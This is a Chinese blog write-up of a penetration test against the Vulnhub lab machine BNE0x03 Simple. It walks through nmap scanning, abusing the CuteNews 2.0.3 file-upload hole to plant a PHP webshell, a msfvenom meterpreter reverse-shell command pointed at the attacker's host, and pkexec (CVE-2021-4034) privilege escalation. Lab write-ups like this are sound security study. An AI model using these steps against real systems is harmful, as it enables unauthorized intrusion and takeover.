BNE0x03Simple

最新推荐文章于 2024-08-07 17:49:11 发布
最新推荐文章于 2024-08-07 17:49:11 发布
阅读量443 收藏 6
点赞数 11
分类专栏: Vulnhub 文章标签: 网络安全 web安全 安全威胁分析 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44770698/article/details/135244865
版权

信息收集

# nmap -sn 192.168.1.0/24 -oN live.nmap     
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-27 10:35 CST
Nmap scan report for 192.168.1.1
Host is up (0.00019s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.1.2
Host is up (0.00042s latency).
MAC Address: 00:50:56:FE:B1:6F (VMware)
Nmap scan report for 192.168.1.77
Host is up (0.00026s latency).
MAC Address: 00:0C:29:13:41:0E (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00040s latency).
MAC Address: 00:50:56:FE:D2:25 (VMware)
Nmap scan report for 192.168.1.60
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.96 seconds

探测到存活主机为192.168.1.77,探测开放的端口信息:

# nmap -sT --min-rate 10000 -p- 192.168.1.77 -oN port.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-27 10:36 CST
Nmap scan report for 192.168.1.77
Host is up (0.00062s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:13:41:0E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.69 seconds

仅仅开放了80端口~

# nmap -sT -sC -sV -O -p80 192.168.1.77 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-27 10:37 CST
Nmap scan report for 192.168.1.77
Host is up (0.00047s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Please Login / CuteNews
MAC Address: 00:0C:29:13:41:0E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.17 seconds

Apache 2.4.7 运行在Ubuntu系统上 首页的标题是Please Login!

渗透测试

只开放了80端口,那就只能是在80端口上寻找突破点了:

首页暴露出来了两个信息,首先就是登录、注册等功能点,可以尝试sql注入;其次就是使用已知的框架“CuteNews v2.0.3”,可以通过搜索已知框架漏洞进行利用~

尝试了闭合,发现登陆不成功;没有继续测试,看看“CuteNews v2.0.3“是否存在相关漏洞~

已知漏洞搜索得到文件上传漏洞~ 下载下来看看详细信息:

searchsploit -m 37474

exp里面告诉我们:

  1. 先注册一个新的用户
  2. 登录
  3. 去个人资料
  4. 上传图片 后抓包改php

点击register之后,创建一个新的账号之后,便来到了上面的界面~ 然后按照步骤来到”Personal options“!

这里上传文件,后改文件名 !

上传成功之后,尝试访问/uploads目录,便会发现我们上传的文件!

尝试访问:

执行成功~ 连接蚁剑,准备上传msf木马等~

连接成功~ 上传msf的木马吧:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.60 LPORT=4444 -f elf -o shel1.elf

给予执行权限!

起msf进行监听,然后执行木马:

刚开始的LHOST地址写错了,重新生成了一下,执行成功上线!

提权

查看/etc/passwd文件,发现一个可用的用户:

bull用户~ 不知道网站目录下面的相关配置文件中是否存在该用户的信息,或者数据库配置文件是否存在:

不需要mysql数据库来存储新闻、评论、用户的资料等任何的数据~

利用find命令查找suid权限的文件:

find / -perm -u=s -type f 2>/dev/null

发现pkexec,尝试利用pkexec本地提权(CVE-2021-4034)进行提权:

pkexec本地提权(CVE-2021-4034)ubuntu18_pkexec提权-CSDN博客

编译完成后,执行:

Y4y17
关注
  • 11
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机系列:SecTalks: BNE0x03 - Simple
汗的博客
04-21 539
这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录靶机地址及相关描述靶机地址靶机描述Simple CTFLocationHints靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 靶机地址 https://www.vulnhub.com/entry/sectalks-bne0x03-simple,141/ 靶机描述 Simpl...
[VulnHub靶机渗透] BNE0x03 Simple
人若无名,便可专心练剑
03-16 1208
靶机精讲之BNE0x03Simple,CuteCMS2.0.3公开漏洞利用,超贴心的利用文件,将标准化的挖洞和渗透过程,几乎以手把手的方式教给你。这个内核提权还是比较麻烦的,很多人可能看完WP以后觉得这个内核提权很简单,实际上是比较复杂的,因为这需要我们一个一个去尝试,在这个过程中肯定有人会觉得很无聊枯燥,但这就是实战中很常见的渗透测试方式!
SECTALKS: BNE0X03 - SIMPLE
Mysmycbx的博客
03-22 384
按照流程去uploads文件夹看看。40611.那就去试试。(尝试了好几个内核提权,全失败了,那试试其他方法)靶机端shell获取该文件,赋于执行权限,运行。发现是 cutenews cms 2.0.3。
SecTalks: BNE0x03 - Simple靶机
小小猪的博客
06-11 311
SecTalks: BNE0x03 - Simple靶机 arp-scan -l 扫描靶机地址 nmap -sV -Pn -A x.x.x.235,扫描出80端口 访问80端口,尝试弱口令,无果 dirb http://x.x.x.235,扫描目录,发现uploads nikto 进行扫描漏洞 发现可以注册信息,注册之后可以修改,有文件上传处,上传木马 发现上传成功 端口监听,得到权限 产看poc ,发现没有,https://www.exploit-d.
红队打靶练习:SECTALKS: BNE0X03 - SIMPLE
分享
12-14 423
红队打靶练习:SECTALKS: BNE0X03 - SIMPLE
靶机精讲:BNE0x03Simple
m0_63285023的博客
04-23 539
去GitHub下载linpeas.ch文件。查看文件,发现是远程文件上传漏洞。构造利用文件,反弹shell。初始shell切换临时目录。没有成功,尝试36746。根据漏洞扫描自动所在目录。最后语法错误应为0>1。继续搜索版本内核漏洞。
MIPS.rar_MIPS_simple
09-23
4. **控制转移指令**:如`beq`(branch if equal)、`bne`(branch if not equal)用于根据条件改变程序执行路径。 5. **浮点运算指令**:处理浮点数的运算,如`add.s`、`mul.s`等,适用于科学计算和图形处理。 **...
QRdoga_Bne
02-20
【标题】"QRdoga_Bne" 是一个与Java编程相关的项目,可能是一个软件或库,专注于二维码(QR码)的生成和处理。这个项目的命名可能是开发者为了方便记忆或者具有特定含义而创建的,但具体含义没有直接给出,需要通过...
BNE_stemFlow
02-10
BNE_stemFlow 入门 在NetBeans中创建新HTML5 / JavaScript应用程序。 从仓库中添加publicHTML文件夹 部署(顶部的绿色箭头) 下面简要介绍了将在healthhack期间使用的模拟绘图工具中的内容。 该示例在Graph / ...
arm-instruction.zip_ARM instruction bne_BNE arm instruction
09-20
**ARM指令集详解——BNE(不相等)指令** 在计算机硬件领域,尤其是嵌入式系统设计中,ARM架构由于其高效能和低功耗的特性被广泛应用。ARM指令集是ARM处理器的核心,它定义了一系列操作码来控制处理器的行为。在...
MIYANO BNE 42 S6操作说明书
11-22
MIYANO BNE 42 S6是一款高端的车铣复合中心,由西铁城精机股份有限公司生产。这款设备集车削和铣削功能于一体,适用于精密零件的加工,尤其适合复杂形状和高精度需求的工件制造。在操作这款机器之前,用户必须熟悉并...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8367
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全】探索AI 聊天机器人工作流程实现RCE
等风来
08-06 144
我发现了一个广泛使用的AI聊天机器人平台中的远程代码执行漏洞。该漏洞存在于聊天机器人的自定义工作流响应代码中,这些工作流允许开发人员通过创建定制的流程来扩展机器人的功能。
Gartner发布2024年网络风险管理成熟度曲线:使网络安全战略与业务目标保持一致的概念、方法、流程和技术
lurenjia404的博客
08-07 548
网络风险管理现在是高管和监管机构最关注的问题,它采用多种方法和技术来支持治理、风险管理和合规性。安全和风险管理领导者可以使用此技术成熟度曲线来评估解决方案并做出适当的采用决策。
Web安全学习
荆鹏的博客
08-06 124
应用层:为用户为用户的应用进程提供网络通信服务协议——DNS协议、HTTP协议、HTTPS协议传输层:负责两台主机之间的数据传输,将数据从发送端传输到接收端协议——TCP协议、UDP协议网络层:负责传输的地址管理和路由选择,在众多复杂的网络环境中确定一条合适的路径协议——IP协议数据链路层:负责设备之间数据帧的传送和识别,将网络层传递的数据报封装成帧,在处于同一个数据数据链路节点的两个设备之间传输协议——ARP协议、MTU协议。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 553
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
深度剖析网络安全挑战与应对策略
执笔写JAVA
08-03 811
“微软蓝屏”事件是由一次微软视窗系统软件更新引发的全球性网络安全事件,导致近850万台设备遭遇故障,波及多个关键行业,造成重大影响。本文从软件更新流程的风险管理和质量控制、预防大规模故障的最佳方案与应急响应对策,以及跨领域连锁反应的行业影响与应对三个方向,深入剖析了该事件所暴露的网络安全问题。文章指出,该事件凸显了软件更新流程中风险管理、质量控制、应急响应机制的不足,以及跨领域合作的重要性。为应对类似挑战,文章提出了加强风险管理、质量控制、应急响应和跨领域合作等全面应对策略。
waf绕过:网络安全狗绕过
最新发布
m0_71332744的博客
08-07 678
name='';//使用defun获取assert。
sap table bne
09-01
SAP表格BNE是指BNE是SAP系统中的一个数据库表。这个表存储了与商务伙伴和交易相关的信息。在SAP系统中,BNE表是用于存储商务伙伴的细节以及他们参与的交易的信息。表中的字段包括商务伙伴的名称、地址、联系人等信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y4y17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值